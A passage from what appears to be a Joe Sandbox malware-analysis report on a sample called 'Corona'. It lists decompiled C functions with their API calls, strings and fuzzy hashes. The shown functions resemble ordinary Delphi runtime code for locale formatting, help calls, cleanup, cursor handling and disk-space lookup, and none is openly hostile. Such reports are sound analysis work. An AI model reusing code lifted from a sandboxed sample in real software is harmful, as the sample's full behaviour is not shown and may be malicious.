                                  • Instruction Fuzzy Hash: 7DC10435A006188FDB10DFA9C880A9EB7F5FF09304F5581AAE504EB366DB34AD49CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040AD34(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* _t41;
                                  				signed int _t45;
                                  				signed int _t47;
                                  				signed int _t49;
                                  				signed int _t51;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				signed int _t77;
                                  				signed int _t83;
                                  				signed int _t92;
                                  				intOrPtr _t111;
                                  				void* _t122;
                                  				void* _t124;
                                  				intOrPtr _t127;
                                  				void* _t128;
                                  
                                  				_t128 = __eflags;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t122 = __edx;
                                  				_t124 = __eax;
                                  				_push(_t127);
                                  				_push(0x40aefe);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t127;
                                  				_t92 = 1;
                                  				E00403E4C(__edx);
                                  				E0040A9FC(GetThreadLocale(), 0x40af14, 0x1009,  &_v12);
                                  				if(E00407DB8(0x40af14, 1, _t128) + 0xfffffffd - 3 < 0) {
                                  					while(1) {
                                  						_t41 = E0040410C(_t124);
                                  						__eflags = _t92 - _t41;
                                  						if(_t92 > _t41) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                  						asm("bt [0x45010c], eax");
                                  						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                  							_t45 = E004083B0(_t124 + _t92 - 1, 2, 0x40af18);
                                  							__eflags = _t45;
                                  							if(_t45 != 0) {
                                  								_t47 = E004083B0(_t124 + _t92 - 1, 4, 0x40af28);
                                  								__eflags = _t47;
                                  								if(_t47 != 0) {
                                  									_t49 = E004083B0(_t124 + _t92 - 1, 2, 0x40af40);
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                  										__eflags = _t51;
                                  										if(_t51 == 0) {
                                  											L24:
                                  											E00404114(_t122, 0x40af58);
                                  										} else {
                                  											__eflags = _t51 != 0x20;
                                  											if(_t51 != 0x20) {
                                  												E00404034();
                                  												E00404114(_t122, _v24);
                                  											} else {
                                  												goto L24;
                                  											}
                                  										}
                                  									} else {
                                  										E00404114(_t122, 0x40af4c);
                                  										_t92 = _t92 + 1;
                                  									}
                                  								} else {
                                  									E00404114(_t122, 0x40af38);
                                  									_t92 = _t92 + 3;
                                  								}
                                  							} else {
                                  								E00404114(_t122, 0x40af24);
                                  								_t92 = _t92 + 1;
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						} else {
                                  							_v8 = E0040BDA4(_t124, _t92);
                                  							E0040436C(_t124, _v8, _t92,  &_v20);
                                  							E00404114(_t122, _v20);
                                  							_t92 = _t92 + _v8;
                                  						}
                                  					}
                                  				} else {
                                  					_t75 =  *0x452744; // 0x9
                                  					_t76 = _t75 - 4;
                                  					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                  						_t77 = 1;
                                  					} else {
                                  						_t77 = 0;
                                  					}
                                  					if(_t77 == 0) {
                                  						E00403EA0(_t122, _t124);
                                  					} else {
                                  						while(_t92 <= E0040410C(_t124)) {
                                  							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                  							__eflags = _t83;
                                  							if(_t83 != 0) {
                                  								__eflags = _t83 != 0x20;
                                  								if(_t83 != 0x20) {
                                  									E00404034();
                                  									E00404114(_t122, _v16);
                                  								}
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						}
                                  					}
                                  				}
                                  				L28:
                                  				_pop(_t111);
                                  				 *[fs:eax] = _t111;
                                  				_push(E0040AF05);
                                  				return E00403E70( &_v24, 4);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040AEFE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040AD63
                                    • Part of subcall function 0040A9FC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AA1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: 56457dd0aded12b185d039f6b6f6fc95ca0564812ebc5c96a98f8ff01f4a4015
                                  • Instruction ID: 085d6218f6d344d443898964295cb586d748297af314c1f8b1c85b88ffd8fa5a
                                  • Opcode Fuzzy Hash: 56457dd0aded12b185d039f6b6f6fc95ca0564812ebc5c96a98f8ff01f4a4015
                                  • Instruction Fuzzy Hash: 2A4107B07043064BC711EB65C8822BFB296DFD4304B10443BA541BB7D2EA3CDD1296AF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00428DD0(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				void* _t33;
                                  				long _t46;
                                  				CHAR* _t48;
                                  				void* _t55;
                                  				intOrPtr _t67;
                                  				void* _t74;
                                  				char _t76;
                                  				void* _t79;
                                  
                                  				_t74 = __edi;
                                  				_t78 = _t79;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v32 = 0;
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				_t76 = __edx;
                                  				_t55 = __eax;
                                  				_push(_t79);
                                  				_push(0x428ec8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t79 + 0xffffffe4;
                                  				_t81 = __edx;
                                  				if(__edx == 0) {
                                  					E0040B274(0x428970, 1);
                                  					E00403888();
                                  				}
                                  				_v28 = _t76;
                                  				_v24 = 0xb;
                                  				E00428B1C(_t55, _t55,  &_v32, 0, _t74, _t76);
                                  				_v20 = _v32;
                                  				_v16 = 0xb;
                                  				E00408938("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
                                  				_t33 = E00429460(_t55, _t74, _t78, _t81);
                                  				_t82 = _t33;
                                  				if(_t33 != 0) {
                                  					E00428B1C(_t55, _t55,  &_v12, 0, _t74, _t76);
                                  					if(E004293B8(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
                                  						 *((char*)(_t55 + 0x10)) = 1;
                                  						E00403EA0(_t55 + 0x14, _v8);
                                  						_t46 = E0040430C(_v8);
                                  						_t48 = E0040430C(_v12);
                                  						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
                                  					}
                                  				}
                                  				_pop(_t67);
                                  				 *[fs:eax] = _t67;
                                  				_push(0x428ecf);
                                  				E00403E4C( &_v32);
                                  				return E00403E70( &_v12, 2);
                                  			}


















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Help
                                  • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$d&E$@B
                                  • API String ID: 2830496658-687985326
                                  • Opcode ID: 3a757cc33a4ce42f065446dacb6df0ab27d1374880d65cf39d622fc947cd6dce
                                  • Instruction ID: 8534f94596467151efe14ad8bf1206272215468322af3bb2306d355280946b1e
                                  • Opcode Fuzzy Hash: 3a757cc33a4ce42f065446dacb6df0ab27d1374880d65cf39d622fc947cd6dce
                                  • Instruction Fuzzy Hash: B7316670B002149BDB04EFA5D851A9EBBB9EF48304F91457EF800E7382DB789E058799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E004231B8(void* __ebx, void* __ecx, void* __edx) {
                                  				intOrPtr _t3;
                                  				intOrPtr _t5;
                                  				intOrPtr _t7;
                                  				intOrPtr _t10;
                                  				intOrPtr _t12;
                                  				intOrPtr _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				void* _t20;
                                  				void* _t27;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  
                                  				_t27 = __ecx;
                                  				_push(_t38);
                                  				_push(0x423281);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t38;
                                  				 *0x452890 =  *0x452890 + 1;
                                  				if( *0x452890 == 0) {
                                  					_t3 =  *0x4528e8; // 0x2130aa8
                                  					E004030FC(_t3);
                                  					_t5 =  *0x4506cc; // 0x21339ec
                                  					E004030FC(_t5);
                                  					_t7 =  *0x4506c8; // 0x2133b04
                                  					E004030FC(_t7);
                                  					E004202D0(__ebx, _t27);
                                  					_t10 =  *0x4506d0; // 0x2130acc
                                  					E004030FC(_t10);
                                  					_t12 =  *0x4528e4; // 0x2130b08
                                  					E004030FC(_t12);
                                  					_t14 =  *0x4528d8; // 0x2130a30
                                  					E004030FC(_t14);
                                  					_t16 =  *0x4528dc; // 0x2130a58
                                  					E004030FC(_t16);
                                  					_t18 =  *0x4528e0; // 0x2130a80
                                  					E004030FC(_t18);
                                  					_t20 =  *0x45288c; // 0xa8080a0b
                                  					DeleteObject(_t20);
                                  					_push(0x4528a8);
                                  					L00405E34();
                                  					_push(0x4528c0);
                                  					L00405E34();
                                  					_t34 =  *0x412278; // 0x41227c
                                  					E004048D4(0x4505e8, 0x12, _t34);
                                  					_t35 =  *0x412278; // 0x41227c
                                  					E004048D4(0x450448, 0x34, _t35);
                                  				}
                                  				_pop(_t33);
                                  				 *[fs:eax] = _t33;
                                  				_push(0x423288);
                                  				return 0;
                                  			}

















                                  APIs
                                  • DeleteObject.GDI32(A8080A0B), ref: 00423230
                                  • RtlDeleteCriticalSection.KERNEL32(004528A8,A8080A0B,00000000,00423281), ref: 0042323A
                                  • RtlDeleteCriticalSection.KERNEL32(004528C0,004528A8,A8080A0B,00000000,00423281), ref: 00423244
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Delete$CriticalSection$Object
                                  • String ID: |"A
                                  • API String ID: 378701848-79920896
                                  • Opcode ID: 4022fc7ed0d5e980474f717a32cd62e73d97c1f8dd6fd59c19e4eb525cbdc8f1
                                  • Instruction ID: 7ff0270cd9c17a7ec8594388005b9095b7a43081d402d3bae0dd43b380dd6274
                                  • Opcode Fuzzy Hash: 4022fc7ed0d5e980474f717a32cd62e73d97c1f8dd6fd59c19e4eb525cbdc8f1
                                  • Instruction Fuzzy Hash: C2013034209284DFE700FF69ED4391937A8E741306750867BB500AB6B7CABDDD119B2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004238EC(intOrPtr* _a4, signed int _a8) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  				void* _t19;
                                  
                                  				_t17 = _a8;
                                  				_t14 = _a4;
                                  				if( *0x452922 != 0) {
                                  					_t19 = 0;
                                  					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                  						_t19 = 0x12340042;
                                  					}
                                  				} else {
                                  					_t16 =  *0x452900; // 0x4238ec
                                  					 *0x452900 = E0042377C(2, _t14, _t16, _t17, _t18);
                                  					_t19 =  *0x452900(_t14, _t17);
                                  				}
                                  				return _t19;
                                  			}












                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042393D
                                  • GetSystemMetrics.USER32 ref: 00423949
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect$8B
                                  • API String ID: 1792783759-3728447208
                                  • Opcode ID: 1f2cd9ad4c6d57b119639a008c8fccd411056af884c1bd36cb935d3e9bfb11bc
                                  • Instruction ID: 161ab9d895ccde48d9710f5918d133d8779ce8cfd105203c0021783ce7830bb2
                                  • Opcode Fuzzy Hash: 1f2cd9ad4c6d57b119639a008c8fccd411056af884c1bd36cb935d3e9bfb11bc
                                  • Instruction Fuzzy Hash: 5B012CB57002299FEB109F55F985B66BB74E747397F848067E9049A302C2FCDDC48BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004366CC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				struct tagRECT _v28;
                                  				intOrPtr _t19;
                                  				struct HWND__* _t20;
                                  				intOrPtr* _t23;
                                  
                                  				_t20 = __eax;
                                  				_t1 =  &_a4; // 0x436944
                                  				_t23 =  *_t1;
                                  				_v12 = __edx;
                                  				_v8 = __ecx;
                                  				_t4 =  &_v12; // 0x436944
                                  				ClientToScreen(__eax, _t4);
                                  				GetWindowRect(_t20,  &_v28);
                                  				_t6 =  &_v12; // 0x436944
                                  				 *_t23 =  *_t6 - _v28.left;
                                  				_t19 = _v8 - _v28.top;
                                  				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                  				return _t19;
                                  			}









                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ClientRectScreenWindow
                                  • String ID: DiC$DiC
                                  • API String ID: 3371951266-514404270
                                  • Opcode ID: 0faa47d8d30c0205b1855967f5f1500c71ecfb9b3eef3408c9d333563e6a0c01
                                  • Instruction ID: 8eb09ce6ed2c4160a7baa381af755d6850ede66a152c56aca62fb38e4b447501
                                  • Opcode Fuzzy Hash: 0faa47d8d30c0205b1855967f5f1500c71ecfb9b3eef3408c9d333563e6a0c01
                                  • Instruction Fuzzy Hash: 8FF0A2B190420DAFCB00DFE9C9818DEFBFCEB08210F10456AA955E3341D631AA508BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C6B0() {
                                  				_Unknown_base(*)()* _t1;
                                  				struct HINSTANCE__* _t3;
                                  
                                  				_t1 = GetModuleHandleA("kernel32.dll");
                                  				_t3 = _t1;
                                  				if(_t3 != 0) {
                                  					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                  					 *0x450130 = _t1;
                                  				}
                                  				if( *0x450130 == 0) {
                                  					 *0x450130 = E004081FC;
                                  					return E004081FC;
                                  				}
                                  				return _t1;
                                  			}





                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040D119,00000000,0040D12C), ref: 0040C6B6
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040C6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 00c90e06f0698e43cc24e66a46213d66158d7cdafda0f5d1fcb4f00283f85d37
                                  • Instruction ID: 9657a0c6f71de8a4917827327cc38b0922dddad60181b76ab3d0a6f2693937d7
                                  • Opcode Fuzzy Hash: 00c90e06f0698e43cc24e66a46213d66158d7cdafda0f5d1fcb4f00283f85d37
                                  • Instruction Fuzzy Hash: 8DD05EB0650B45CADF219BB59CD161A3194A714306F102A3B6480BA2D3CBBECC00DA1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0042C704(intOrPtr* __eax, signed int __edx) {
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _t49;
                                  				intOrPtr _t50;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				intOrPtr* _t60;
                                  				intOrPtr* _t62;
                                  				struct HICON__* _t65;
                                  				intOrPtr _t67;
                                  				intOrPtr* _t72;
                                  				intOrPtr _t74;
                                  				intOrPtr* _t75;
                                  				intOrPtr _t78;
                                  				intOrPtr _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t84;
                                  				intOrPtr _t85;
                                  				struct HWND__* _t88;
                                  				intOrPtr _t89;
                                  				intOrPtr _t91;
                                  				intOrPtr* _t93;
                                  				intOrPtr _t97;
                                  				intOrPtr _t100;
                                  				intOrPtr _t102;
                                  				intOrPtr _t103;
                                  				intOrPtr _t104;
                                  				intOrPtr _t106;
                                  				struct HWND__* _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t110;
                                  				intOrPtr _t114;
                                  				intOrPtr _t117;
                                  				char _t118;
                                  				intOrPtr _t119;
                                  				void* _t131;
                                  				intOrPtr _t135;
                                  				intOrPtr _t140;
                                  				intOrPtr* _t155;
                                  				void* _t158;
                                  				void* _t165;
                                  				void* _t166;
                                  
                                  				_t155 = __eax;
                                  				if( *0x452b4c != 0) {
                                  					L3:
                                  					_t49 =  *0x452b2c; // 0x0
                                  					_t50 =  *0x452b2c; // 0x0
                                  					_t117 = E0042C5E4(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                  					if( *0x452b4c == 0) {
                                  						_t168 =  *0x452b50;
                                  						if( *0x452b50 != 0) {
                                  							_t106 =  *0x452b40; // 0x0
                                  							_t107 = GetDesktopWindow();
                                  							_t108 =  *0x452b50; // 0x0
                                  							E00436838(_t108, _t107, _t168, _t106);
                                  						}
                                  					}
                                  					_t53 =  *0x452b2c; // 0x0
                                  					if( *((char*)(_t53 + 0x9b)) != 0) {
                                  						__eflags =  *0x452b4c;
                                  						_t6 =  &_v24;
                                  						 *_t6 =  *0x452b4c != 0;
                                  						__eflags =  *_t6;
                                  						 *0x452b4c = 2;
                                  					} else {
                                  						 *0x452b4c = 1;
                                  						_v24 = 0;
                                  					}
                                  					_t54 =  *0x452b30; // 0x0
                                  					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                  						L12:
                                  						_t55 =  *0x452b30; // 0x0
                                  						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                  						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                  						_t56 =  *0x452b30; // 0x0
                                  						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                  							_t97 =  *0x452b30; // 0x0
                                  							E0042E338( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                  							_t100 =  *0x452b30; // 0x0
                                  							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                  							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                  						}
                                  						_t131 = E0042C634(2);
                                  						_t121 =  *_t155;
                                  						_t60 =  *0x452b30; // 0x0
                                  						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                  						if( *0x452b50 != 0) {
                                  							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                  								_t82 =  *0x452b50; // 0x0
                                  								E00436820(_t82, _t158);
                                  								_t84 =  *0x452b50; // 0x0
                                  								_t177 =  *((char*)(_t84 + 0x6a));
                                  								if( *((char*)(_t84 + 0x6a)) != 0) {
                                  									_t121 =  *((intOrPtr*)(_t155 + 4));
                                  									_t85 =  *0x452b50; // 0x0
                                  									E00436920(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                  								} else {
                                  									_t88 = GetDesktopWindow();
                                  									_t121 =  *_t155;
                                  									_t89 =  *0x452b50; // 0x0
                                  									E00436838(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                  								}
                                  							} else {
                                  								_t91 =  *0x452b50; // 0x0
                                  								E00436994(_t91, _t131, __eflags);
                                  								_t93 =  *0x451104; // 0x452bb4
                                  								SetCursor(E0044BCE8( *_t93, _t158));
                                  							}
                                  						}
                                  						_t62 =  *0x451104; // 0x452bb4
                                  						_t65 = SetCursor(E0044BCE8( *_t62, _t158));
                                  						if( *0x452b4c != 2) {
                                  							L32:
                                  							return _t65;
                                  						} else {
                                  							_t179 = _t117;
                                  							if(_t117 != 0) {
                                  								_t118 = E0042C670(_t121);
                                  								_t67 =  *0x452b30; // 0x0
                                  								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                  								__eflags = _t118;
                                  								if(__eflags != 0) {
                                  									E0042E338(_t118,  &_v24, _t155);
                                  									_t65 = E004032F8(_t118, __eflags);
                                  									_t135 =  *0x452b30; // 0x0
                                  									 *(_t135 + 0x54) = _t65;
                                  								} else {
                                  									_t78 =  *0x452b30; // 0x0
                                  									_t65 = E004032F8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                  									_t140 =  *0x452b30; // 0x0
                                  									 *(_t140 + 0x54) = _t65;
                                  								}
                                  							} else {
                                  								_push( *((intOrPtr*)(_t155 + 4)));
                                  								_t80 =  *0x452b30; // 0x0
                                  								_t65 = E004032F8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                  							}
                                  							if( *0x452b30 == 0) {
                                  								goto L32;
                                  							} else {
                                  								_t119 =  *0x452b30; // 0x0
                                  								_t41 = _t119 + 0x5c; // 0x5c
                                  								_t42 = _t119 + 0x44; // 0x44
                                  								_t65 = E004079CC(_t42, 0x10, _t41);
                                  								if(_t65 != 0) {
                                  									goto L32;
                                  								}
                                  								if(_v28 != 0) {
                                  									_t75 =  *0x452b30; // 0x0
                                  									 *((intOrPtr*)( *_t75 + 0x34))();
                                  								}
                                  								_t72 =  *0x452b30; // 0x0
                                  								 *((intOrPtr*)( *_t72 + 0x30))();
                                  								_t74 =  *0x452b30; // 0x0
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								return _t74;
                                  							}
                                  						}
                                  					}
                                  					_t65 = E0042C634(1);
                                  					if( *0x452b30 == 0) {
                                  						goto L32;
                                  					}
                                  					_t102 =  *0x452b30; // 0x0
                                  					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                  					_t103 =  *0x452b30; // 0x0
                                  					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                  					_t104 =  *0x452b30; // 0x0
                                  					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                  					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                  					_t65 = E0042C634(0);
                                  					if( *0x452b30 == 0) {
                                  						goto L32;
                                  					}
                                  					goto L12;
                                  				}
                                  				_t110 =  *0x452b3c; // 0x0
                                  				asm("cdq");
                                  				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x452b48; // 0x0
                                  				if(_t165 >= 0) {
                                  					goto L3;
                                  				}
                                  				_t114 =  *0x452b40; // 0x0
                                  				asm("cdq");
                                  				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                  				_t166 = _t65 -  *0x452b48; // 0x0
                                  				if(_t166 < 0) {
                                  					goto L32;
                                  				}
                                  				goto L3;
                                  			}


                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0042C778
                                  • GetDesktopWindow.USER32 ref: 0042C89D
                                  • SetCursor.USER32(00000000), ref: 0042C8F2
                                    • Part of subcall function 00436994: 73451770.COMCTL32(00000000,?,0042C8CD), ref: 004369B0
                                    • Part of subcall function 00436994: ShowCursor.USER32(000000FF,00000000,?,0042C8CD), ref: 004369CB
                                  • SetCursor.USER32(00000000), ref: 0042C8DD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Cursor$DesktopWindow$73451770Show
                                  • String ID:
                                  • API String ID: 3513720257-0
                                  • Opcode ID: 1dcfd6b92667e6187864cec8dbfdd658c3bac7b9e5933bbe4ac15449e969a89b
                                  • Instruction ID: 5b5aaf0a81d5917144a57d9995636050d907c1f276da4fb83b6be688eae297a0
                                  • Opcode Fuzzy Hash: 1dcfd6b92667e6187864cec8dbfdd658c3bac7b9e5933bbe4ac15449e969a89b
                                  • Instruction Fuzzy Hash: 10915DB87013518FC704DF29E9D4A1AB7E1BF5A305F54896BE8448B362C7B8EC45CB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040E4D4(intOrPtr* __eax) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				intOrPtr* _v776;
                                  				signed short* _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				char _v792;
                                  				intOrPtr* _v796;
                                  				signed char _t43;
                                  				intOrPtr* _t60;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t84;
                                  				void* _t85;
                                  				intOrPtr* _t92;
                                  				void* _t96;
                                  				char* _t97;
                                  				void* _t98;
                                  
                                  				_v776 = __eax;
                                  				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                  					E0040E3A0(0x80070057);
                                  				}
                                  				_t43 =  *_v776;
                                  				if((_t43 & 0x00000fff) == 0xc) {
                                  					if((_t43 & 0x00000040) == 0) {
